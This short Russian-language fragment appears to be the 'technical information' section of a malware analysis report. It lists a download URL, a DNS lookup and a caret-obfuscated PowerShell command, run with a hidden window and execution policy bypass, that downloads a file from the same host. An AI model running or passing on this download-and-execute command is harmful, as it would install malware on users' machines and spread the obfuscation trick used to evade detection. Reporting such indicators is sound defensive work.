Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^o^w^ErSheLl.E^x^e -ExeCUtioNPoLiC^y^ B^yPaS^S -N^OPr^Ofile^ -wI^nDo^wSTY^L^E^ Hid^D^EN (ne^W-Ob^JECT^ s^YsteM.NeT^.W^EBcliE^n^T).dOwNLO^A^DfiLE('http://mondayhelthc.top/read.ph...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "p^o^w^ErSheLl.E^x^e -ExeCUtioNPoLiC^y^ B^yPaS^S -N^OPr^Ofile^ -wI^nDo^wSTY^L^E^ Hid^D^EN (ne^W-Ob^JECT^ s^YsteM.NeT^.W^EBcliE^n^T).dOwNLO^A^DfiLE('http://mondayhelthc.top/read.ph...' (со скрытым окном)